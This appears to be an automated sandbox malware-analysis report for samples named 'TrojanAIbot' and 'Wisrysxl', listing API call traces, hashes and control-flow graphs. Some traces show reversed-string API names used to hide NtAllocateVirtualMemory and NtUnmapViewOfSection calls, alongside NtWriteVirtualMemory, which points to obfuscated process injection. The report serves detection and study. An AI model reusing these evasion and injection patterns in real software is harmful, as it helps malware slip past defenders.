                                                                                                                                • Instruction Fuzzy Hash: 1511F2B58043489FDB10DF9AD885BDEBBF8EB48324F10841AE969A7200D375A944CFA5
                                                                                                                                APIs
                                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06773687), ref: 06774125
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DispatchMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                • Opcode ID: 2eaee824a55e3dd2ccdb616b737b3b67fda661d2ef6db0040f2ddb717b30cea5
                                                                                                                                • Instruction ID: 69b46c198a68c1a5c3787c2dc3e5eb212bf2df55fd996b6e449e003449572d52
                                                                                                                                • Opcode Fuzzy Hash: 2eaee824a55e3dd2ccdb616b737b3b67fda661d2ef6db0040f2ddb717b30cea5
                                                                                                                                • Instruction Fuzzy Hash: 7C11EDB5D04658CFCB20DF9AD844BDEFBF4EB48214F10846AE829A3250D378A544CFA5
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0677319D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: d51ff3ad896987e1a5d8ace9ea54d03f2d4bb840a20be771859a57af66559ce3
                                                                                                                                • Instruction ID: f01920daf1a4a1944fdaaa58b9395d3cd44782685879d8f2cf76f75834ba5ad1
                                                                                                                                • Opcode Fuzzy Hash: d51ff3ad896987e1a5d8ace9ea54d03f2d4bb840a20be771859a57af66559ce3
                                                                                                                                • Instruction Fuzzy Hash: 031115B5C007488FDB50CFAAD944BDEFBF4AB48720F14881AD419A7640C379A944CFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 193 67721b0-67731aa OleInitialize 195 67731b3-67731d0 193->195 196 67731ac-67731b2 193->196 196->195
                                                                                                                                APIs
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0677319D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Initialize
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                • Opcode ID: 85071b281b54dc7dcc1e7fac8d7b562f2595769b94c154c5fe145bd87efc03f6
                                                                                                                                • Instruction ID: 0355342d04987e22a3f1a5e12fcc64b68a51d21f7eaca09d643718b5de047686
                                                                                                                                • Opcode Fuzzy Hash: 85071b281b54dc7dcc1e7fac8d7b562f2595769b94c154c5fe145bd87efc03f6
                                                                                                                                • Instruction Fuzzy Hash: CD1115B59007488FDB20DF9AD848BDEFBF8EB48220F10841AD519A7640D375A944CFA5
                                                                                                                                APIs
                                                                                                                                • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06773687), ref: 06774125
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DispatchMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2061451462-0
                                                                                                                                • Opcode ID: c73a7c39ff611f00902fb3b1f35954a700fdf074ef5f12f46998acabee4ca9e1
                                                                                                                                • Instruction ID: b21331ed93aa2975ce496c93b6e570c510f634b0cf3cca92d7289562f01ea489
                                                                                                                                • Opcode Fuzzy Hash: c73a7c39ff611f00902fb3b1f35954a700fdf074ef5f12f46998acabee4ca9e1
                                                                                                                                • Instruction Fuzzy Hash: 8C1112B5D00648CFCB10CFAAE844BDEFBF4EB48314F10842AD828A7650C378A544CFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2687566740.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_178d000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1fd738986432958d2e8a8d3f7d6b8883149fb5ed7bc1c855f28d56e6af01dadb
                                                                                                                                • Instruction ID: 14a44af7ec19cc185f915502f54d63eb51738de70c7676d09bf514a27022dccf
                                                                                                                                • Opcode Fuzzy Hash: 1fd738986432958d2e8a8d3f7d6b8883149fb5ed7bc1c855f28d56e6af01dadb
                                                                                                                                • Instruction Fuzzy Hash: 8D210771644344EFDB25EF94D9C4B16FBA5FB84314F20C5ADE8494B286C336D447CA62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2687566740.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_178d000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
                                                                                                                                • Instruction ID: 8cbbaa6683436ab175fd9529c9b102e2299369ab7be50fa667aec7725dfcf967
                                                                                                                                • Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
                                                                                                                                • Instruction Fuzzy Hash: 9E110075548280CFCB12DF54D5C4B15FFA1FB44314F24C6A9D8094B696C33AD40BCB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2687261774.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_177d000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2a4cc3c244d57ae2f9b23d1452887a9a497e815d9a40c15c3e679d69fa895e2e
                                                                                                                                • Instruction ID: 8a5998728bb2d6934f4b8f17312fd0986e437480ab1aef4ee540ee79c0eb7f6e
                                                                                                                                • Opcode Fuzzy Hash: 2a4cc3c244d57ae2f9b23d1452887a9a497e815d9a40c15c3e679d69fa895e2e
                                                                                                                                • Instruction Fuzzy Hash: 6901A771404344ABEB315A65C8847A7FFD8EF85664F18D45AED090B283C3759445CA71
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.2687261774.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_177d000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 40f2a8e62c2e03d5687e2c778159a5358da34b304f663eb36fd9425701080f3e
                                                                                                                                • Instruction ID: ede40b0fcf74399833c1f86237300b9dc70728a1bbc352242ae51d6f45422f4e
                                                                                                                                • Opcode Fuzzy Hash: 40f2a8e62c2e03d5687e2c778159a5358da34b304f663eb36fd9425701080f3e
                                                                                                                                • Instruction Fuzzy Hash: AFF09071408344AFEB219E1ACC84B63FFE8EF85674F18C45AED585B297C3799844CAB1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c22da23a17f2617d2863d21e0dbb8cf9ca47f946cc0691d646cb743493148607
                                                                                                                                • Instruction ID: 926797dcfeb9661ed4415ca7b19d65cf53908b85a3fb33026f10b39be8994db1
                                                                                                                                • Opcode Fuzzy Hash: c22da23a17f2617d2863d21e0dbb8cf9ca47f946cc0691d646cb743493148607
                                                                                                                                • Instruction Fuzzy Hash: C562AE70A01269CFDB64DF64D894B9EBBB2FB49304F1080E9D44AAB355EB365E81CF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f4f6ae035e32b1515c34b6357e60407610ea4da4d2f6d8e6021c0c4567c0c9c7
                                                                                                                                • Instruction ID: 70916812050104932f7207dab089af384f6bd03b30032acc198a8d850b56d97f
                                                                                                                                • Opcode Fuzzy Hash: f4f6ae035e32b1515c34b6357e60407610ea4da4d2f6d8e6021c0c4567c0c9c7
                                                                                                                                • Instruction Fuzzy Hash: D462AE70A01269CFDB64DF64D894B9EBBB2FB49304F1080E9D44AAB355EB365E81CF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52089d1514e84d87513234f8f9de4bd762baa2d9dbb737b121757e1cd7bb88fd
                                                                                                                                • Instruction ID: 1bd3b0295a27ea464e3d475b07e7c32ae0f3052ef3ea10489db08b6e2b29b6ab
                                                                                                                                • Opcode Fuzzy Hash: 52089d1514e84d87513234f8f9de4bd762baa2d9dbb737b121757e1cd7bb88fd
                                                                                                                                • Instruction Fuzzy Hash: 1C116970C15349DFEB04AFB8D4293FEBFB0EB06301F4458AAD555A3280EB784688CB51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 097904fe5a9fcd4802c101a48462ca563fc1156f2e4ef669da105151805b76ba
                                                                                                                                • Instruction ID: b552be45ff1ac7501fe8b04c7c8f39bf5c0533bfeb0555b2d31f77570b7cd97a
                                                                                                                                • Opcode Fuzzy Hash: 097904fe5a9fcd4802c101a48462ca563fc1156f2e4ef669da105151805b76ba
                                                                                                                                • Instruction Fuzzy Hash: 68015A70C51319DFDB04EFB8C4193AEBFF0EB06301F4098AA9515A3280EB784688CF51

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:8.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:168
                                                                                                                                Total number of Limit Nodes:12
                                                                                                                                execution_graph 27206 2a9656c 27207 2a96577 27206->27207 27210 2a94198 27207->27210 27209 2a965b1 27212 2a941de 27210->27212 27211 2a9425c 27211->27209 27214 2a94419 27211->27214 27217 2a9442a 27211->27217 27212->27211 27222 2a94130 27212->27222 27227 2a9435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 27214->27227 27216 2a94423 27216->27217 27218 2a9446f FreeLibrary 27217->27218 27219 2a94493 27217->27219 27218->27217 27220 2a9449c 27219->27220 27221 2a944a2 ExitProcess 27219->27221 27220->27221 27223 2a94173 27222->27223 27224 2a94140 27222->27224 27223->27211 27224->27223 27228 2a95868 27224->27228 27232 2a915cc 27224->27232 27227->27216 27229 2a95878 GetModuleFileNameA 27228->27229 27230 2a95894 27228->27230 27236 2a95acc GetModuleFileNameA RegOpenKeyExA 27229->27236 27230->27224 27255 2a91560 27232->27255 27234 2a915d4 VirtualAlloc 27235 2a915eb 27234->27235 27235->27224 27237 2a95b4f 27236->27237 27238 2a95b0f RegOpenKeyExA 27236->27238 27254 2a95908 6 API calls 27237->27254 27238->27237 27239 2a95b2d RegOpenKeyExA 27238->27239 27239->27237 27241 2a95bd8 lstrcpyn GetThreadLocale GetLocaleInfoA 27239->27241 27245 2a95c0f 27241->27245 27246 2a95cf2 27241->27246 27242 2a95b74 RegQueryValueExA 27243 2a95b94 RegQueryValueExA 27242->27243 27244 2a95bb6 RegCloseKey 27242->27244 27243->27244 27247 2a95bb2 27243->27247 27244->27230 27245->27246 27248 2a95c1f lstrlen 27245->27248 27246->27230 27247->27244 27249 2a95c37 27248->27249 27249->27246 27250 2a95c5c lstrcpyn LoadLibraryExA 27249->27250 27251 2a95c84 27249->27251 27250->27251 27251->27246 27252 2a95c8e lstrcpyn LoadLibraryExA 27251->27252 27252->27246 27253 2a95cc0 lstrcpyn LoadLibraryExA 27252->27253 27253->27246 27254->27242 27256 2a91500 27255->27256 27256->27234 27257 2a91a8f 27258 2a91aa1 27257->27258 27270 2a9170d 27257->27270 27259 2a91aa7 27258->27259 27263 2a91b13 Sleep 27258->27263 27262 2a91ab0 27259->27262 27266 2a91b4b Sleep 27259->27266 27269 2a91b81 27259->27269 27260 2a916e8 27273 2a91644 Sleep Sleep 27260->27273 27261 2a91c66 27263->27259 27265 2a91b2d Sleep 27263->27265 27265->27258 27268 2a91b61 Sleep 27266->27268 27266->27269 27267 2a916f5 VirtualFree 27267->27270 27268->27259 27271 2a91c00 VirtualFree 27269->27271 27272 2a91ba4 27269->27272 27270->27257 27270->27259 27270->27260 27270->27261 27273->27267 27274 2abc35c timeSetEvent 27275 2abc350 27278 2aaf7c8 27275->27278 27279 2aaf7d0 27278->27279 27279->27279 29158 2aa88b8 LoadLibraryW 27279->29158 27281 2aaf7f1 27282 2aaf7f6 27281->27282 27283 2aaf806 27282->27283 27284 2aaf80a 27283->27284 27285 2aaf81b 27283->27285 29172 2a94530 27284->29172 27286 2a94530 8 API calls 27285->27286 27288 2aaf819 27286->27288 29163 2a94860 27288->29163 29178 2aa8274 29158->29178 29160 2aa88f1 29186 2aa7d78 29160->29186 29164 2a94871 29163->29164 29165 2a948ae 29164->29165 29166 2a94897 29164->29166 29168 2a945a0 8 API calls 29165->29168 29167 2a94bcc 8 API calls 29166->29167 29170 2a948a4 29167->29170 29168->29170 29169 2a948df 29170->29169 29171 2a94530 8 API calls 29170->29171 29171->29169 29173 2a94534 29172->29173 29176 2a94544 29172->29176 29175 2a945a0 8 API calls 29173->29175 29173->29176 29174 2a94572 29174->27288 29175->29176 29176->29174 29177 2a92c2c 8 API calls 29176->29177 29177->29174 29179 2a94530 8 API calls 29178->29179 29180 2aa8299 29179->29180 29197 2aa798c 29180->29197 29182 2aa82a6 29183 2aa82c6 GetProcAddress GetProcAddress 29182->29183 29201 2a94500 29183->29201 29187 2a94530 8 API calls 29186->29187 29188 2aa7d9d 29187->29188 29189 2aa798c 8 API calls 29188->29189 29190 2aa7daa 29189->29190 29239 2aa81cc 29190->29239 29193 2aa8274 10 API calls 29194 2aa7dd3 NtWriteVirtualMemory 29193->29194 29195 2a94500 8 API calls 29194->29195 29196 2aa7e0c FreeLibrary 29195->29196 29196->27281 29198 2aa799d 29197->29198 29205 2a94bcc 29198->29205 29200 2aa79ad 29200->29182 29203 2a94506 29201->29203 29202 2a9452c 29202->29160 29203->29202 29204 2a92c2c 8 API calls 29203->29204 29204->29203 29206 2a94bd9 29205->29206 29210 2a94c09 29205->29210 29208 2a94be5 29206->29208 29211 2a945a0 29206->29211 29208->29200 29216 2a944dc 29210->29216 29212 2a945c8 29211->29212 29213 2a945a4 29211->29213 29212->29210 29220 2a92c10 29213->29220 29215 2a945b1 29215->29210 29217 2a944fd 29216->29217 29218 2a944e2 29216->29218 29217->29208 29218->29217 29230 2a92c2c 29218->29230 29221 2a92c27 29220->29221 29224 2a92c14 29220->29224 29221->29215 29222 2a92c1e 29222->29215 29223 2a92d19 29229 2a92ce8 7 API calls 29223->29229 29224->29222 29224->29223 29228 2a96520 TlsGetValue 29224->29228 29227 2a92d3a 29227->29215 29228->29223 29229->29227 29231 2a92c3a 29230->29231 29232 2a92c30 29230->29232 29231->29217 29232->29231 29233 2a92d19 29232->29233 29237 2a96520 TlsGetValue 29232->29237 29238 2a92ce8 7 API calls 29233->29238 29236 2a92d3a 29236->29217 29237->29233 29238->29236 29240 2a94530 8 API calls 29239->29240 29241 2aa81ef 29240->29241 29242 2aa798c 8 API calls 29241->29242 29243 2aa81fc 29242->29243 29244 2aa8274 10 API calls 29243->29244 29245 2aa8215 GetModuleHandleA 29244->29245 29246 2a944dc 8 API calls 29245->29246 29247 2aa7dcd 29246->29247 29247->29193 29248 2a91727 29249 2a91968 29248->29249 29250 2a9173c 29248->29250 29251 2a91a80 29249->29251 29252 2a91938 29249->29252 29261 2a917cb Sleep 29250->29261 29262 2a9174e 29250->29262 29254 2a91a89 29251->29254 29255 2a91684 VirtualAlloc 29251->29255 29256 2a91947 Sleep 29252->29256 29266 2a91986 29252->29266 29253 2a9175d 29257 2a916df 29255->29257 29258 2a916af 29255->29258 29259 2a9195d Sleep 29256->29259 29256->29266 29273 2a91644 Sleep Sleep 29258->29273 29259->29252 29261->29262 29265 2a917e4 Sleep 29261->29265 29262->29253 29263 2a9182c 29262->29263 29267 2a9180a Sleep 29262->29267 29271 2a915cc VirtualAlloc 29263->29271 29272 2a91838 29263->29272 29264 2a916bf 29264->29257 29265->29250 29268 2a915cc VirtualAlloc 29266->29268 29270 2a919a4 29266->29270 29267->29263 29269 2a91820 Sleep 29267->29269 29268->29270 29269->29262 29271->29272 29273->29264

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 10939 2a95acc-2a95b0d GetModuleFileNameA RegOpenKeyExA 10940 2a95b4f-2a95b92 call 2a95908 RegQueryValueExA 10939->10940 10941 2a95b0f-2a95b2b RegOpenKeyExA 10939->10941 10946 2a95b94-2a95bb0 RegQueryValueExA 10940->10946 10947 2a95bb6-2a95bd0 RegCloseKey 10940->10947 10941->10940 10942 2a95b2d-2a95b49 RegOpenKeyExA 10941->10942 10942->10940 10944 2a95bd8-2a95c09 lstrcpyn GetThreadLocale GetLocaleInfoA 10942->10944 10948 2a95c0f-2a95c13 10944->10948 10949 2a95cf2-2a95cf9 10944->10949 10946->10947 10950 2a95bb2 10946->10950 10951 2a95c1f-2a95c35 lstrlen 10948->10951 10952 2a95c15-2a95c19 10948->10952 10950->10947 10953 2a95c38-2a95c3b 10951->10953 10952->10949 10952->10951 10954 2a95c3d-2a95c45 10953->10954 10955 2a95c47-2a95c4f 10953->10955 10954->10955 10956 2a95c37 10954->10956 10955->10949 10957 2a95c55-2a95c5a 10955->10957 10956->10953 10958 2a95c5c-2a95c82 lstrcpyn LoadLibraryExA 10957->10958 10959 2a95c84-2a95c86 10957->10959 10958->10959 10959->10949 10960 2a95c88-2a95c8c 10959->10960 10960->10949 10961 2a95c8e-2a95cbe lstrcpyn LoadLibraryExA 10960->10961 10961->10949 10962 2a95cc0-2a95cf0 lstrcpyn LoadLibraryExA 10961->10962 10962->10949
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02A95AE8
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B06
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B24
                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
                                                                                                                                • RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001), ref: 02A95BA9
                                                                                                                                • RegCloseKey.ADVAPI32(?,02A95BD8,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB
                                                                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A95BE8
                                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02A95BF5
                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02A95BFB
                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 02A95C26
                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02A95C6D
                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95C7D
                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02A95CA5
                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95CB5
                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95CDB
                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95CEB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                • API String ID: 1759228003-3917250287
                                                                                                                                • Opcode ID: 7f31b219eeafb70db9325782edbe4442eb947da5a546844091410a60c69538a8
                                                                                                                                • Instruction ID: 91f8effe37962583a818632f2214ea46107db35cf0f45570bfddc18ea6a8d784
                                                                                                                                • Opcode Fuzzy Hash: 7f31b219eeafb70db9325782edbe4442eb947da5a546844091410a60c69538a8
                                                                                                                                • Instruction Fuzzy Hash: 8F517071E4025D7AFF26D6A58D86FEFB7ED9B04744F8001A1AA04E6181EE749A44CFA0

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 1888340430-445027087
                                                                                                                                • Opcode ID: 721c563548309d42360be402fbcdb73fae7761d0d5ba362d97d0f6dae0615942
                                                                                                                                • Instruction ID: 04ad797ea940bfaea9401290f9688fa28aade0376696c0be490d7b5351d258b5
                                                                                                                                • Opcode Fuzzy Hash: 721c563548309d42360be402fbcdb73fae7761d0d5ba362d97d0f6dae0615942
                                                                                                                                • Instruction Fuzzy Hash: 9A110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 1888340430-445027087
                                                                                                                                • Opcode ID: fe9785d9fd33e701be74f66de23d5afb8c3a6ce144959324961ccbb209e8e642
                                                                                                                                • Instruction ID: 2647ba031a1c38a3953d0cf44aa726fed76ba51fdcf0c3a707fb999508d70046
                                                                                                                                • Opcode Fuzzy Hash: fe9785d9fd33e701be74f66de23d5afb8c3a6ce144959324961ccbb209e8e642
                                                                                                                                • Instruction Fuzzy Hash: 57110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02AA86D5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                • API String ID: 858119152-2520021413
                                                                                                                                • Opcode ID: 5bcada767e1bf3afe91513f32f0476574cac102cae6ebefda23803b1d11f0359
                                                                                                                                • Instruction ID: 3d61b6c054345c4fe64e1c794b21399867a0da4830d78d7a7aafd70b1f1a0523
                                                                                                                                • Opcode Fuzzy Hash: 5bcada767e1bf3afe91513f32f0476574cac102cae6ebefda23803b1d11f0359
                                                                                                                                • Instruction Fuzzy Hash: 72014F75A80304BFEB00EBA5ED61A5EB7EEEF49740F918860A40097600DF38AD029A14
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02AA86D5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
